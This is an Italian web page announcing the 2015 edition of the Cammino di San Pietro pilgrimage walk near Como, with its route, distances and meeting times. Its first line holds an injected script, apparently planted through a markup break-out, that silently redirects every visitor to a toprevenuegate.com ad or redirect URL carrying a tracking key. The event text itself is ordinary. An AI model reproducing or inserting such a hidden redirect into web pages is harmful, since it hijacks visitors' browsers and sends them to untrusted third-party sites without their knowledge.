Homepagepekok"> <script type="text/javascript">window.location.href = "https://www.toprevenuegate.com/h3fmr4cy75?key=98d6b304028129d66597825ae1de5eb8";</script>
SUL CAMMINO DI SAN PIETRO: EDIZIONE 2015
In questo 2015 il Cammino di San Pietro si è ricollegato a nord con l’antica Via Regina e a sud si è prolungato fino alla Basilica di S. Eustorgio in Milano. IUBILANTES, IDEATRICE E PROMOTRICE del CAMMINO, ha anche provveduto ad arricchire la segnaletica leggera dell’intero percorso. E ha trasformato la tradizionale manifestazione sul Cammino di San Pietro , in occasione della SETTIMA GIORNATA NAZIONALE DEI CAMMINI FRANCIGENI, domenica 3 maggio 2015, in una nuova edizione incentrata su un tema importantissimo:la riscoperta della grande via storica del nostro territorio, l’asse transalpino Via Spluga /CAMMINI DELLA REGINA/ Cammino di San Pietro, verso la Via Francigena.
Addirittura, propone un doppio cammino, con partenza rispettivamente da Como e da Lentate sul Seveso, e convergente su Cantù - piazza Garibaldi e poi a Galliano. Un cammino che tocca importanti punti di interesse del percorso, resi disponibili anche grazie alla preziosa collaborazione delle Associazioni del territorio, e che sarà accompagnato, in itinere, da brevi notizie storico-ambientali curate dai volontari IUBILANTES. Circa 11 km per tratta, su un tracciato facile e piacevole, alla portata anche dei meno “allenati”. Una bella occasione di riscoperta dei luoghi e della storia del nostro territorio. Gli appuntamenti? A Como, davanti al Duomo alle ore 9.00; a Lentate in Piazza S. Vito, oratorio di S. Stefano, alle 9.15. Si raccomandano scarpe e attrezzatura da trekking e colazione al sacco.